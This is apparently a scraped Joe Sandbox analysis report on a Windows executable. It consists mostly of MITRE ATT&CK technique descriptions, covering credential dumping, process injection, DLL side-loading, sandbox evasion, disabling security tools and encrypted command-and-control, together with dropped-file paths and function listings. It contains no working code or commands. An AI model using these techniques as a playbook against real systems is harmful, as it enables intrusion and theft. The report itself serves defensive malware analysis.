Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report XeFYBYYj0w.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\18155I0h

C:\Users\user\AppData\Local\Temp\aut22C2.tmp

C:\Users\user\AppData\Local\Temp\unrosined

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
XeFYBYYj0w.exe

Function 00A13B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Function 00A149A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00A14E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 00A79155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 00A13015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Function 00A13041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 00A1708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00A13A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00A13633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00A13766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Function 0114B520 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00A139D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 0114B2E0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147
fileCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre